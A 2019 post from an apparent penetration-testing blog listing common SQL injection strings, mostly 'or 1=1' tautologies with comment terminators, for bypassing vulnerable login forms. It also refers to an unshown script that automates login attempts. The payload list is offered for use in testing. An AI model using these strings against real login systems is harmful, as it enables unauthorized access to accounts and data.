Skip to content

Pentesting reports

Notes on penetration testing journeys

Common strings used to bypass login forms

Posted on 2019/01/08 - 2019/02/01 by trouble

Following are the most common strings used to bypass vulnerable login forms.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
' or 'a'='a
') or ('a'='a
" or "a"="a
") or ("a"="a
' or 1=1 limit 1 -- -+
'=' 'OR'

You can use this script to generate permutations and make automatic login attempts.

Posted in Bypass loginTagged bypass, bypass login form, sql injection, strings

Post navigation

PHP: make post request with cURL

Music from Soundcloud

Pages

  • Manifesto
  • Get in touch

Categories

  • Arbitrary file download
  • Bash one-liners
  • Bypass login
  • PHP snippets

RSS feed: RSS Feed from Exploit DB RSS Feed from Exploit DB

  • [remote] CVE-2026-42167 - ProFTPD mod_sql post-authentication SQLi - RCE
  • [remote] PCMan 2.0.7 - Buffer Overflow
  • [webapps] Linuxfabrik monitoring_plugins_6.0.0 - SSRF
  • [webapps] Nodemailer 9.0.0 - File Read/ SSRF
  • [webapps] flyto-core 2.26.7 - Arbitrary File Write
  • [dos] NanaZip 6.5 - DoS
  • [remote] D-Link DNS_340L - OS Command Injection
  • [remote] ipTIME A3004T - Remote Code Execution
  • [webapps] Duplicati 2.2.0.3 - JWT Signing Key Leak
  • [dos] Nmap 7.99 - Extension Header Integer Underflow

RSS feed: RSS Feed from Packetstorm RSS Feed from Packetstorm

RSS feed: Rss Feed from Nist Rss Feed from Nist

Proudly powered by WordPress | Theme: micro, developed by DevriX.